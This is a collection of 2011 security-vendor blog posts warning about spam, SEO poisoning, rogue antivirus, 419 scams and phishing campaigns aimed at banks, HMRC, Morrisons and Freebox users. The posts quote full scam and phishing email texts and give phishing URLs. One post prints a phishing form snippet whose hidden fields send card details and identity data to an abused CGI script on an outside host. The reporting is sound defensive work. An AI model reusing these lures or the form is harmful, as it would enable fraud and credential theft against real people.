Computer Security Articles

As we have seen with many major events in the past, news of the British Royal Wedding is currently being used by cyber criminals to bolster their spam campaigns and push rogue antivirus software through black hat search engine optimization (SEO) techniques.
 

Spam campaigns

We have blogged previously about “snowshoe” spammers targeting the upcoming British Royal Wedding of Prince William and Kate Middleton. Spam email messages advertising a replica of Princess Diana’s engagement ring that were observed in February are still making the rounds on the Internet, and the eve of the royal wedding is now upon us. Furthermore, as we had anticipated, we have recently observed additional spam campaigns making use of this significant event to promote various products.

In one such recent spam campaign, email promoting a “limited edition Buckingham Mint Royal Wedding Commemorative Coin” at a discounted rate is being observed:

 
The IP address involved in this particular spam attack is from a domain owned by an email marketing company based in the UK. The link in the body of the email at first briefly redirects to the domain lpmtrk.info-created on January 14, 2011-before redirecting to the final destination site. This domain was registered using a domain privacy service to obscure its identity so it could be used for spamming activities.

In another spam campaign, limited edition customizable mugs and t-shirts are being promoted at a discounted rate:
 

Sample “From” and “Subject” lines observed in these and related spam attacks are listed below:

From: Sovenir <souvenir@yahveh.permissionalert.com>
From: Sovenir souvenir@ardent.informationfoot.com
From: “Timeless Royal Ring” <royalring@yinstenarm.com>
From: “British Heirloom Ring” <royalring@yinstenarm.com>

Subject: Get a limited-edition royal wedding mug now
Subject: Get A Limited Edition Royal Wedding T-Shirt Now
Subject: Share in the most anticipated wedding of the century
Subject: A Beautiful Simulated Sapphire Ring

The domains that are linked to the above email addresses are spammer-owned domains created recently, most likely for spamming purposes. The two domains used in the email addresses above were registered on April 7, 2011, to the same registrant. The links in the above spam emails first redirect to the domain linked to the email address before redirecting to the actual spam website. Spammers have also included opt-out links (not included in the screenshots above), which are most likely bogus.

The IP addresses involved in the above spam messages are traced back to the United States. These IP addresses have been blacklisted due to their past involvement in spam campaigns. Rest assured, Symantec Brightmail filters are in place to block these and related spam email attacks.
 

Black hat SEO

With only one day left before the “big day,” searches related to the Royal wedding are gaining momentum on the Web. Black hat SEO techniques are being used in “fake” pages to lure people looking for news related to the royal wedding.

At one point, a search for “william and kate movie imdb” returned 61 malicious links in the first 100 search results. Fifty-eight of the first 100 results for the search term “princess diana death photos” and 45 of the first 100 results for the search term “royal wedding guest list kanye” also led to malicious sites.

Screenshots of the search results for the term “royal wedding gown sketches” are shown below, in which Norton Safe Web indicates 6 of the 8 links are malicious:

 
Some of these poisoned pages receive very high search engine rankings, and appear in the first page of search results. The following screenshot shows a malicious URL appearing as the first link in the results (right below the news links) for the term “Royal wedding time.”

The Norton Safe Web site reports at safeweb.norton.com provide a detailed threat report for sites rated red or yellow:

Here are some other search terms currently returning poisoned links:

.    william and kate movie cast
.    prince charles age
.    princess diana death facts
.    prince harry last name
.    william and kate movie on lifetime
.    royal wedding guest list bush
.    royal wedding guest list snubs
.    prince charles siblings
.    the royal wedding date and time

We have seen over 500 compromised sites being used in this campaign over the past few days. Attackers create multiple fake pages on each site and use unethical SEO techniques-such as keyword stuffing, cloaking, and link farming-to “game” the search engine algorithms to achieve high search engine rankings.

These poisoned links generally have the following pattern:

hxxp://<domain name>/<random 2 character string>-<search keyword>

Most of these poisoned links redirect (307 Temporary Redirect) to co.cc domains that host rogue antivirus software. We came across 11 different co.cc domains being used in this campaign so far.

The screenshot below shows the usual fake scanning/rogue antivirus activity that claims a whole bunch of serious errors and threats need to be cleaned from your computer:

When searching for information on the Internet, make sure your legitimate antivirus software is updated and be wary of scam pages asking you to download “antivirus” software.

Symantec’s multilayered protection technologies provide coverage for all of these attacks. The Norton Safe Web toolbar identifies and blocks poisoned search results.

Norton survey results

Our Norton team at Symantec recently conducted a Royal Wedding survey. The results of the survey were released on April 18, 2011, and they exhibit some interesting facts as listed below-as well as some that were quite shocking:

* 62% of Americans surveyed are likely to follow the British royal wedding.

* 87% of those surveyed responded that, as of March 25, they were already following the news about the upcoming wedding.

* Moreover, one-third of respondents will seek their royal wedding news online, making them more susceptible to online scams and other threats.

* One-quarter of respondents said they are interested in the royal wedding primarily because they love the notion of royalty with all its pomp and ceremony.

* Nearly 1 in 4 said their primary reason for following the wedding is because they want to see the lavish decorations, food, and clothing.

Royal Wedding 2.0 – The first “e-royal wedding”

* Nearly 40% of all respondents will seek their royal wedding information online.

* 67% of 18-34 year olds will seek their royal wedding information online.
            
* 87% of 18-24 year olds will seek their royal wedding information online.

* More than a quarter of respondents will be watching the wedding on a computer, laptop, or mobile device, either live or recorded.

* 53% of respondents will potentially share their thoughts about the royal wedding online (e.g., social networks, micro-blogs, and blogs).

People are unaware and unprotected from cybercriminal “wedding crashers”

* 18-34 year olds are more than twice as likely to not have security software (or not know if they do) on their laptop or computer than those 45 or older.

* 87% of 18-24 year olds seek their royal wedding information through online channels, and-shockingly-that same amount of 18-24 year olds don’t know what search engine optimization (SEO) poisoning is, or how it affects them.

—————————————

Note: This blog has been researched and written by Symantec’s Suyog Sainkar, Nithya Raman, and Helen Malani.

The wave of  United Parcel Service, DHL Global and Post Express Office spam – which has been so prolific and leading to scareware infections – changed to Bobijou Inc. over the Easter weekend.

However, the first batch sent out was flawed. As you can see below, the file attached has a “.dat” extension.

The mistake was rectified on Monday, with a proper zipped attachment:

One extracted the file looks like a PDF document. but is in fact an executable:

Detection rates are not bad, although leading AV vendors still let it get through to the Inbox.

Bobijou is a famous British pearl jewellery brand. I wonder why pick on a jeweler? Is it because of the upcoming Royal Wedding?

Jerome Segura

It’s been over a month since we wrote about fake Twitter email messages, and if it worked once for scammers, they’ll certainly try it again. Commtouch labs is seeing large quantities of – you guessed it – fake Twitter email messages, similar to the one here:

How can the uninitiated determine that it’s not a real message from microblogging service Twitter? Well, the typo in the subject and body give the first clue (it should say “2 direct messages” not “message” in the singular – but that’s just petty). The really easy way to tell is to simply mouse over the “twitter” URL and look for the real URL that will show up either at the bottom of the window, or right over the cursor, depending on your email program. If the real URL is not a Twitter URL, then it’s definitely a scam.

I can’t even tell you what this particular message was trying to get from its recipient since by the time I clicked the link — less than 24 hours after it had been received — the link was already dead. Past fake Twitter messages have been pharmacy spam, but since the site was already taken down it may have been phishing. A short-lived landing page is also a surefire sign that the email is not legit. Real web sites typically keep their landing pages around for a long time — practically forever, in fact — since no marketer wants to take the chance that someone will open their mail several weeks after its been sent and execute the sought-after act of clicking through, and then have this enchanted potential customer land on a non-existent page. Phishers and scammers, however, are always trying to outrun security software and the law, and one of the ways they try to do so is to keep their sites up for a very short time. The flood inboxes with messages linking to the ephemeral scam/phish landing page, and anyone that they can convince to click through in the short time the page is live, clicks, anyone after that short time the site is taken down has been saved from the scam simply by being slow to open their email.

During the last 18 months we saw a growing number of targeted attacks against numerous companies and organizations. Let’s briefly have a look at some of them:

• The Aurora Attack: an attack that began in mid 2009 and continued until December 2009. The primary goal of this attack was to gain access to high tech, security and defense companies and potentially modify source code repositories. For example at Adobe, Juniper, Google, Yahoo, etc.
• German Emissions Trading Authority (DEHSt): suffered from phishing attacks carried out in January 2010. Scamsters circulated their fraudulent emails masquerading as email from the DEHSt and persuaded the recipients to login to a counterfeit website, ironically to protect themselves against alleged hacker attacks. Using the stolen access data, the attackers transferred emissions permits, primarily to Denmark and Great Britain, and in so doing allegedly gained up to three million Euros illegally. It is readily apparent that targeted phishing attacks can be very lucrative.
• Stuxnet: a Windows computer worm discovered in July 2010 that targets industrial SCADA  software and equipment with the aim of attacking an Iranian nuclear plant. The attack seems to have been successful as the enrichment of Uranium was heavily delayed.
• G20 Files attack: was announced in March 2011 but had already been going on for several months. The G20 is made up of the finance ministers and central bank governors of 19 countries and discusses key issues of the global economy. Over 150 ministry computers of the G20 were attacked. The attacks aimed at files related to the G20 meetings.
• RSA breach: RSA is a well known security company specialized in identity and access solutions. Hackers may have gained access to part of the code generation algorithm used in RSA SecurID tokens. At least some information was extracted but it’s still unsure if it will actually cause future problems.
• EU Commission Summit attack: this was a targeted attack against some specific servers at the EU Commission in Brussels, found and stopped before the EU March 2011 Summit. As not much is known about it, we suppose that nothing important has been leaked.
• Epsilon email breach: Epsilon is a well known online marketing company that is working with hundreds of large companies around the world and stores millions of email addresses in its databases. Hackers have stolen customer email addresses and names belonging to a “subset of its clients”. Some big companies such as Disney, Citibank, Verizon, etc . were involved.

And this list is still not complete.

What do they all have in common? It is a fact that all attacks were targeted at a specific organization, industry or company. Most of these targeted attacks were looking for confidential information. With the RSA attack they were looking for intellectual property. Stuxnet was an exception as cyber sabotage seemed the real motivator. Sometimes it is very difficult to figure out the motive.  Sometimes it is even difficult to estimate if the attack was successful or not, as this depends on the attacker’s intentions.  Above all, social engineering has been used in all of these cases, ranging from spear sent mails (spear phishing) to the use of infected USB sticks – but all this involved human action.

Nevertheless, all these attacks or breaches illustrate the new reality concerning security:  cyber espionage as like cybercrime is simpler to perpetrate but a lot more difficult to spot. There is hardly any risk involved if you compare it to the more traditional methods. This is the new front line – including attacks against military facilities as well as politically and financially motivated attacks.

As some of the attacks were quite successful we expect to see at least another growing number of targeted attacks as the cybercriminals have now access to more email addresses and new targets to direct the attack at. A rise of specific targeted phishing mails is only one thing to watch out for in the coming months.

But what have we learnt?

• All systems can be attacked, even systems not connected to the internet or autonomous networks protected by a gateway.
• Every system  requires updates for the installed software (Flash, Adobe, OS, etc.)
• Even if the gateway is protected you still require protection on the internal systems regardless of whether there is important data on them or not.

The combination of social tricks against humans and outdated software on their systems is the key issue in these attacks. Unfortunately, this was also the same problem 10 years ago. Needless to say, we require good security software in place, but if we don’t change our mindset or improve the way we are updating, we still have a long way to go before we win the battle, as this problem will continue to grow in the future.

During our Infosec UK presentation and some other lectures this year we will elaborate on this growing problem.

Easter is a Christian holiday centered on the death of Jesus Christ and His subsequent resurrection several days later. Hence Easter is an important holiday for Christians. But what gets associated with Easter is beautifully decorated Easter eggs found on every decorated shop window this season, and of course the Easter Bunny! To celebrate Easter, people exchange Easter eggs and, with the evolution of time, today we have personalized e-cards and personalized gifts. Spammers have begun to exploit the season by sending personalized e-cards, gift cards, and replica-spam emails.

Here is a screenshot of a personalized Easter e-card:

Here are some of the headers used in Easter e-card spam:

Subject: Give your child the gift of amazement A Package from The Easter Bunny.

Subject: The Most Popular Gift for Kids this Easter 2011

Subject: Send A Personalized Easter Bunny Letter

Subject: How To Make This Your Childs Best Easter Ever.

Subject: This is the secret to making your kids happy this Easter.

Subject: Personalized Easter Bunny Letters

From: “The Easter Bunny” <The.Easter.Bunny@removed.com>

From: “Easter Bunny” <Easter.Bunny@removed.com >

Where personalized Easter gifts are concerned, spammers have targeted replica products offers at unimaginable discounts (as shown in the image below). To create a frenzy, they have also suggested that they have limited stock and therefore one must “HURRY”! But do not get carried away with such false promises. This could be bait used by the spammers to get a hold of the user’s personal information.

Screenshot of the Web site selling fake replica watches:

As Symantec wishes all our readers a very happy Easter, we also advise you to be cautious when handling unsolicited or unexpected emails, especially during this Easter season. Updating antispam signatures regularly protects your personal information from being compromised.

Thanks to Anand Muralidharan for contributed content.

When something sounds too good to be true I always take it with a grain salt.

I came across this tool that “can be used to make western union transfers without any credit card. You even don’t need any phone verification. Also the processes very much secured.” {sic}

Taken from: wubug.org

Supposedly, it can hack Western Union’s databases by changing the receiver’s name, create new money transfers etc.

This program sells for $250 and comes with one year free support.

The organisation that sells this tool also provides web hosting spamming services starting at $25/month

“WUBUG Developers provide web hosting for spammers. We do not care what content you upload. Warez, spam pages, credit cards hacker, upload any thing. We will never suspend your account for such abusive uses.” {sic}

Now, I can’t verify if any of this is real or not. If you do, please let me know (via Twitter as the comments on this blog is currently broken @jeromesegura) and I will update this post.

To end this story, I would like to quote the disclaimer that these guys have printed on their website:

“Please don’t use any information in this website for illegal activities. We will report the the persons involve in illegal activities.” {sic}

They obviously have a good sense of humour.

Update:

A Spanish blog picked up this story and mentioned that the file was detected by most AV vendors on VirusTotal, confirming it is not only a hoax but also malware.

- Jerome Segura

Phishing and 419 scams have been around for a while now. However, sometimes they never cease to amaze when it comes to their tactics. We caught this most recent one in one of our Honeypots and thought we would share due to the “over-the-top” images sent.

Also note the horrific markup of the passport. 

—————————————————————————–

Email sent from: usermail.uni-ak.ac.at ([193.170.136.34]

Email Subject: urgent response

Email body:

Apologies for having to reach out to you like this, my name is Gideon Kerkula am from Liberia, I and my mother just arrived with 2 inherited trunk boxes which our late father kept in our under ground flat which we discover and we collected money from it and I took picture with the two trunk boxes, we need your help to clear the money from the custom and help us invest it in any profitable investment that will last for a life time, the US$35,000 we collected from the boxes we use it for clearance on Ivory Coast- Abidjan border and the settlement of the military and police force on the highway. Please I want you to keep it confidential between us.

I have also attached my passport and the picture I took with the 2 trunks boxes, please if there’s anything you don’t understand or you want to know, ask and we will enlighten you.

I appreciate and wait your response.Please reply to this email;GideonKerkula@removed.cn

Thanks,

Gideon kerkula

—————————————————————————–

Images that were attached:

You would have thought Gideon would have given up at this point – however, there is a follow-up.  Brace yourself for the sequel:

————————————————————————-

From: Kelvin Kerkular [mailto:kkelvin1979@removed.cz]
Sent: 07 April 2011 06:44
Subject: PRIVATE AND CONFIDENTIAL

From:
Kelvin and Vivian
Tel:233 26 750 6123

Dear Beloved,

My name is Kelvin Kerkular I am 32 years old, and my junior sister name is Vivian Kerkular, 29 years old, we are Citizens of Liberia, currently residing in the refugee camp in Ghana. I am contacting you solely on a business related issues.

I became an orphan some couple of years ago. I am contacting you about a need I have and I believe you are well able to help me after my severe and fervent prayer for God to link me up with some one who will be capable of helping me out from Ghana as my foreign beneficiary. It all depends on our trusting each other but I’ve chosen to contact you prayerfully and believing that you are the person that can help me.

The source of my parent’s death was believed to be from our detractors who are never happy that he was making so much progress. The issue is that my parents are diamond merchants in my country Liberia and they made too much money from the business, that prompted the government of Liberia to probe them.

For this reasons, during the crisis in Liberia, our home was among the first target by the Liberian rebels. They allegedly said that, my late parents have a close relationship with former president of Liberia President Charles Taylor) that was their reason of storming our home. My mother died immediately they storm our resident and my father sustained serious bruises that he could not survive while in the hospital. I and my younger sister Vivian managed to escape during the incident. As i am talking to you now, i and my younger sister are staying in Ghana for some obvious reasons that i will like to relay to you on your response to this message.

This is a confidential matter i will like to discuss with someone whom my spirits accepted to deal with. Because after my parents exit, the government of Liberia have taken over all of our belongings. They have also emptied my parents bank accounts left alone with a deposit which my late father made in a nearby country called Ghana during his trade to Ghana. No one knows of this deposit, it is only me as the next of kin. And my father had earlier warned me not to disclose this issue to anyone before he died in the hospital after the incident that cause his death. Today I and my younger sister fend for ourselves here in Ghana.

And life has been very difficult since the government of Ghana started their deportation exercise which says that we refugees should evacuate their Bujumbura refugee camp to our various countries. Please my dear beloved, our plans now are to relocate from Ghana since we can not afford to go back to Liberia following our past experience as they killed our parents, but we will need to move out the fund left by my late father here in Ghana.
please according to my late father’s lawyer all we need now before these boxes can leave Ghana to  is your full contact information so as to enable the lawyer work out the papers that will back up the shipment to your location. Please i believe my lawyer will explain more better to you as soon as you come in contact with him.

Once you agree to help us move this fund, we will link you up with our late father’s lawyer who will help us in securing all the necessary documents for the shipment. As soon as we agree, we will come to your country where I and my sister will invest the money under your guide. So please let us know what will be your compensation or percentage for helping me and my sister out.

In the attached files, you will see a photograph picture which my late father took me before he made the deposit as a proof, and a picture of my sister, Vivian. Please the lawyer have not seen this picture as my father warned me not to disclose the content of the boxes to anyone except to some one whom i have chosen to be my foreign beneficiary, and also attached are the copies of the documents that is covering the fund in the keeping company, so i want you to go through them carefully. sometime ago there was a problem in the camp and my sister lost her Liberia passport but the lawyer agreed to get her a Ghana passport if we are ready to travel out of Ghana to meet with our foreign beneficiary.

Please NOTE that the earlier you help us the better as you will be doing Almighty God a great favor because our lives are no more safe with these people over here. I will need your reply stating your readiness to help in seeing this through.

We will be needing your details as follows:
(1) Your Full Names.
(2) Your Home or Office Address.
(3) Your cell phone Number.
(4) Occupation.
(5) Age.

Please feel free if you have any question to ask.

Thanks and be bless
Kelvin and sister.

————————————————————————-

And yup, you guessed it: more convincing attachments:

And finally, the cream of the crop: a convincing photo of Vivian, Gideon’s or (as he prefers in the second email message) Kelvin’s sister.

Well, Kelvin Gideon Kerkula if that is your real name… consider this. You have been named and shamed.  Unfortunately your overzealous tactics in an attempt to ‘social engineer’ or to convince me and everyone else do not work. 

I wonder what the next in the trilogy will be…

Of course Websense customers are being continually protected against phishing emails such as these with our Advanced Classification Engine, ACE.

Its now Bank of Baroda getting targeted for the phishing attacks.

A mail having subject line : MESSAGE TO ALL BARODA CONNECT USERS!!! getting circulated containing an
attachment.

If you click to open the htm file, it displays Bank of Baroda Login form.This form get displayed from your local machine.
It ask to fill your confidential information such as Corporate ID,User ID, Password etc.

We have analysed the Htm file and found that it contains a fraudulent link http://174.120.139.34/ ~buupy/images/log. php and this is that link,where your confidential data is transferred.

Quick Heal Successfully blocks the fradulent url and delete the malicious htm file too.

Today, we’re going to look closely at a very good example of phishing. There’s probably no need to explain what phishing is, but just to be sure, here is the definition as you can find it on Wikipedia:

„Phishing is a way of attempting to acquire sensitive information such as usernames, passwords  and credit card details by masquerading as a trustworthy entity in an electronic communication.“

Enough with definitions, let’s have a look at the particular example. The target of this scam are the clients of the Česká Spořitelna which is one of the biggest bank in Czech Republic. So how could be such a client deceived?

Typical phishing e-mail

The client receives a warning e-mail which seems to be sent by his bank. The e-mail informs him e.g. about one unread message (as in this case) and offers the direct link to clients internet banking site. There’s no visible address of the target page, so the client simply clicks the link which leads him… to his internet banking. At least it looks like it’s his internet banking site. Let’s have a look at the differences:

Phishing site on the left, original on the right – click the image for larger resolution

1. First thing the user should aim at, is secure connection by https protocol, which most of the banks use. If the site doesn’t use it, it’s, at least, suspicious.
2. Even if there’s some https connection in use, user should always check the web site address. In our case, the phishing site uses very suspicious address: http://www.polevaultunlimited.com/blog/news/1/servis24.cz/ebanking-s24/dispatcher.htm?aid=19101203&lang=cs. Here are two problems – no HTTPS is used for secured transactions, which is the very common method for securing clients data. And, of course, the web address itself is not very trustworthy as well. However, in many cases, the web address is very similar to the original one and the difference could be just one letter or the suffix (.org instead of .com, etc..).
3. The other differences are just the “cosmetics”. The attackers used the old phone number.
4. The format of the phone numbers on the phishing site and original site differs (but the phone numbers are the same)
5. There are small graphical defects (as the attackers altered the content of the site), but big companies usually spend lot of money for their web-sites to be “perfect”.
6. This is probably the most conspicuous element the user should immediately notice. Unless you pay for something via internet, probably no serious company would ask you for your credit card number and even the CVC/CVV code. Finally, this is the main purpose of this whole scam – to get these information.
7. Even if it looks like there are some links, they’re not clickable. Attackers simply copied the picture of the original.
8. The diacritic. Again, companies pay lot of money for having their web-sites perfect. Also, attacking english-written web site is much easier than attacking site written in some other language which is, actually, using diacritic.  And if that language is not the native language of attackers, you can bet there probably will be some mistakes.

These are the differences and what user should be aware of. Unfortunately, lot of users ignore or just pass over these signs and the result is loss of their money. In this particular case, you have to fill in all the fields (they’re mandatory) and there is even some basic check of the data in those fields:

Warning that the CVV / CVC code have to be 3 characters long

And what happens if you “successfully” gave your internet banking credentials or credit card number with cvv to the attacker? At least, they’re polite and thank you for your data. Also, they ask you for being patient and inform you (with a strange word-order) that the process will take next two days to be finished – so they’ll have lot of time to rob your bank account. Consequently, you are automatically transferred to the real bank web site with an article about personal data protection… a bit ironic.

Thank you and please give us two days for robbing your bank account.

In the time of writing this blog the mentioned site is still alive. AVG flags this site as infected by JS/Phish virus and also some web browsers could warn you about phishing attempt.

As usually, think about what you’re doing and where are you filling in your sensitive data. Using the security products such as AVG will help you protecting yourself, but you have always think about what are you doing. Be Safe.

Peter Gramantik & Hynek Blinka

MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “Please Submit Your Payment Refund″ and an attached HTML webpage. We have reported this earlier on on January 27th, 2011, and this campaign is still running in a modified version.

The emails is send from the spoofed email address srvcs@hmrc.gov.uk, and possible other combinations, and has the following body:

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show that you have made over payments of GBP 178.25

Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email.Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

NOTE: If you’ve received an Income Tax ‘repayment’ it will either be following a claim you’ve made or because HM Revenue & Customs (HMRC) has received new information about your taxable income or entitlement to allowances. The refund may come through your tax code or as a payment and could relate to the current tax year or earlier years.

An Income Tax repayment is a refund of tax that you’ve overpaid. So, if you’ve paid too much tax for example through your job or pension this year or in previous years HMRC will send you a repayment. You’ll get the repayment by bank transfer directly to your credit or debit card.

————————————————————–

Copyright 2011, HM Revenue Customs UK All rights reserved.

Attached to the email is an HTML page with the name Refund_Form.htm. Once opened you will have a webform to submit your personal details together with your credit card details.

When looking into the HTML source code we can find that the layout and images are directly taken from the http://www.hmrc.gov.uk/ web site. The form data itself will be directed to hxxp://www.hotel-bergara.com/cgi-bin/mailform.cgi. When submitting data you will be redirected to the HM Revenue & Customs web site. The forms hidden values shows us that the data is sent to govukgov@yahoo.com.

We also have a second example where the email contains an URL to the phishing web site instead of an embedded attachment in the message.

We always point out that Phishing is just another form of Spam since the emails are not wanted by anyone. But, what happens if a Spam mail contains a spoofed URL which is redirecting you to a fake website? Isn’t this a regular Phishing mail then?

In my opinion yes, this is Phishing, and this isn’t really new. For years we can see Phishing targeting Amazon and other big web shops. We are simply used to see the brand Rolex in spams advertising fake watches on some obscure websites. This time the spammers went a step further and sent a Phishing email abusing the name of Rolex.

Unfortunately, the website was already down when we tried to analyze it. As usual, we recommend our readers to delete such emails, never visit the advertised websites since they could contain malware as well and never to buy anything from such questionable websites.

Sorin Mustaca
Data Security Expert

Earlier today, we found a phishing site that poses as a donation site to raise money for the victims of the recent earthquake in Japan. The phishing site http://www.japan{BLOCKED}.com is created by using an open-source social networking system Jcow 4.2.1. It is hosted on the IP address 50.61.{BLOCKED}.{BLOCKED}, which is located in the United States. We’ve confirmed that the site is still active as of this writing.

Aside from hosting a phishing site, the cybercriminals behind this attack also abused the blog function of the website and inserted advertisement-looking posts, possibly to increase the site’s SEO ranking.

Such attacks are not uncommon as we’ve previously documented instances of attacks that leveraged natural disasters such as Hurricane Katrina in 2005, Hurricane Gustav in 2008, Chinese Sichuan earthquake in 2008, the latest attack used the Haiti earthquake in 2010.

Users should remember to choose trustworthy organizations when it comes to handing over their donations.

The Trend Micro™ Smart Protection Network™, through the Web reputation technology already blocks access to this phishing site even if a user is duped into clicking its link.

Post from: TrendLabs | Malware Blog – by Trend Micro

Phishing Attack Uses Fake Donation Website

MX Lab, http://www.mxlab.eu, started to intercept phishing emails targettting the online activities of the Morrisons supermarkets.

The emails has the subject “New Morrisons Offer” and is sent from the spoofed email address “MORRISONS <noreply@morrisons.co.uk>” and has the folowing body contents:

This email is intended to inform you that there is a new offer at Morrisons Store.

This is a 2 weeks time offer. Register your card online and you will get 35% discount when using your card to pay in our stores.

In order to start the registration process please fill and submit the form attached to this email.

© Copyright Wm Morrison Supermarkets plc 2011. All rights reserved.

Attached to the email is the file Registration_Form.htm and once opened in a browser you will have the following screen:

The images and the web site style is taken from the official www.morrisons.co.uk web site but the form contents will be sent to hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi.

When examing the form coding you will notice that this is in fact a CGI (Common Gateway Interface) exploit ,or abuse, as well.

<form style=”margin: 0px;” action=”hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi” method=”post”> <input name=”data_order” type=”hidden” value=”first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number,
==================,document_type,document_no,issue_date,
==================,bank_name,name_on_card,card_number,exp_m,exp_y,cvv” />
<input name=”submit_to” type=”hidden” value=”adw.gray@gmail.com” />
<input name=”submit_by” type=”hidden” value=”abcdursulica@gmail.com” />
<input name=”form_id” type=”hidden” value=”Morrisons Fulls 3″ />
<input name=”ok_url” type=”hidden” value=”http://www.morrisons.co.uk/Offers/” />

These guys have figured out the values that the CGI needs in order to process the webform. It’s not too difficult either because at http://theburleyinn.co.uk/contact.html the CGI is called for a contact web form. All the details are in the HTML page.

The major drawback on this CGI is that there is no control or check from where the CGI query will come from. It should be at least chech wether the CGI request is coming from the samen web site or local hosting server. If this is not the case it should reject the CGI request by default. It can be abused by anyone with some basic knowledge to send out for example a massive spam campaign.

Once the data is submitted on the phishing form, you will be redirected to the official site at http://www.morrisons.co.uk/Offers/.

Phishing attempts like this, where an HTML page is present as attachment instead of a embedded URL, are still being used. The main advandage is that it is more difficult to detect with technologies like Intent Analysis or SUBL that need an URL instead. But on the other hand, as a receiver of this kind of phishing emails, you should be more aware that these kind of emails are not to be trusted. No company in the world is sending you an attachment by email with the request to fill in your credit card details.

[Update March 14th, 2011 - 4:30 PM Local Belgian Time]

We have noticed new phishing emails coming from the spoofed email addresses:

offers@morrissons-discount.com

The attached HTML webform is requesting a CGI on a different server:

hxxp://www.janus-systems.com/cgi-bin/bnbform.cgi.

Last Thursday, I wrote about Facebook Likejacking. Today, similar pages were brought to my attention. They use Likejacking to spread through user profiles using much more aggressive spam techniques.

The pages looks like they come from Facebook. The teaser is a video that should be watched “only if you are 16 or older”. The play button hides a Facebook Like widget.

Spam page looking like Facebook

Before the user can play the video, he must either verify that he is at least 18, or that he is a human … by filling out surveys, trying games, etc.! The spammers are paid for each action taken by the user (PTC campaign).

“Security check”: the user must fill out a survey

If you stay on these pages long enough, they will attempt to send a form on your behalf. Fortunately, Firefox throws a warning.

Firefox prevent the automatic POST

acidattacker.com shows a Facebook page and a Youtube page with the same content.

Fake Youtube page from spammers

These spam pages can be found at:

• hxxp://bnltwo.info/video2/
• hxxp://acidattacker.com/

– Julien

In a traditional phishing scam, a phisher usually sets up a website with a fake login form imitating a legitimate online services such as bank, social networking website, auction site or a payment processing service. In an attempt to lure in users, the phisher spams a link to the website through email or instant messaging. Unfortunately for the phishers, modern browsers like Mozilla Firefox and Google Chrome have become quite good at detecting phishing, immediately warning users when a potential phishing site is being opened.

Mozilla Firefox and Google Chrome warning users of a phishing site.

Phishers, however, have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser.  For example, take a look at these spam samples:

Multiple sample of phishing spam campaign with an HTML attachment.

The HTML attachment, stored locally, successfully opens in the browser without the user being warned.

Sample of a phishing HTML form targetting PayPal users. HTML file is saved in the local directory.

When the victims enter their information and click the “Agree and Submit” button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate webserver (in one case, Fritolay.com)

Usually, stolen information are sent to a hack PHP webserver. (note: we notified Fritolay of the offending php file and observe that it has now been removed.)

The phisher’s PHP script then redirects the browser to Paypal’s homepage after successfully submitting stolen information. While the POST request sends information to the phisher’s remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity. Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective. Logically, however, the browser should be able to detect a URL when the browser sends the POST request. So what makes this type of phishing tactic harder to detect from the browser perspective?  Here’s a couple of reasons:

1. Few PHP URLs are reported as abuse.  Average users are not able to report any URL because no phishing URL is visible, unless they are technical enough to view the HTML source code.

2. The URLs are hard to verify as phishing sites.  The URL alone without the accompanying HTML form would be hard to verify as a phish site because the PHP script runs in the server and no visible HTML is displayed after clicking the submit button, other than redirecting the browser elsewhere to the target brand’s homepage.

We have seen an increase in these types of phishing spam campaigns over the last few months. Last month we blogged about a clever phishing campaign targeting Bank of America online users that uses this same phishing tactic. So be wary of HTML attachments included in an email.  If the email seems suspicious, avoid opening the HTML attachment. And if you do happen to open it, be particularly leery of any HTML form requiring you to enter sensitive information.

Most abused TLDs
For the phishing URLs, the ascending trend observed in January 2011 continued with even more entries in February. We observe again that more and more different TLDs are used to host phishing, this being an obvious sign that there are a lot of hacked websites and bots out there. The top of the Malware URLs remain almost unchanged, but surprisingly the trend is negative.

Spam category statistics
We can only confirm again the trend which we observed at the end of 2010 that there is in general less spam out there.

Extension statistics for malware URLs
This month we have seen the situation overturned by the .exe extension which took the lead because of a 67% increase. However, the most abused extension this month is not .exe but .html. This makes also sense considering the storm of updates for all browsers which took place in February and continues in March as well – the cyber criminals tried to abuse security vulnerabilities in the webbrowsers.

Most phished brands statistics
The most attacked brand remains Paypal. It has a big distance from the other entries in the top charts. The reason for this is that we have seen an increase in “other brands” category. It looks like the attempt to attack smaller brands with potentially more success is paying off for the phishers.
The biggest ascender this month is HSBC Bank with 85% increase, which actually made it enter in the top chart (it wasn’t present last month).

URL Shorteners used in malicious activities
Tinyurl.com took the leadership of the most abused shorteners in February. While bit.ly lost in the phishing top, it gained almost the same amount in the malware area making it rule the top chart with more than 23% advantage over the following entries.

Sorin Mustaca
Data Security Expert

MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Facture N: 01-249576284 !”, note that the invoice number changes with each email.

The email is send from the spoofed address “FreeBox -Internet <service@freebox.fr>” and has the following body:

Chers Client (e)

Par mesures de sйcuritй et Grвce а notre expйrience, Nous contrфlons tous les charge inhabituelles liйe a votre compte.
Nous avons le regret de vous informer que votre compte freebox sera limitй , a cause d’un mouvement inhabituel sur votre compte

Numйro de Rйfйrence : BF738492

Pour supprimer cette limitation veuillez mettre а jour de votre information personnel concernant votre compte freebox :

* Cliquez sur le lien suivant : Metter а Jour De Votre Information Personnel .
* Connectez-vous
* Mise а jour vos informations personnelles
* Reconnectez-vous

Vous avez un dйlai de 48h pour rйtablir l’accиs а votre compte sans ceux votre compte sera supprimй dйfinitivement !

Veuillez croire, Madames et Monsieurs, а l’expression de nos sentiments les plus respectueux.

Service Freebox !

The phishing URL is behind the text “Metter а Jour De Votre Information Personnel” and points in this case to hxxp://dedecome.com/. When we visited the site for investigation, the web page in question was not available. But rest asure, this is a phishing attempt.

It always pays to be on your guard, as a phish attempt may crop up in the most unlikely of places.

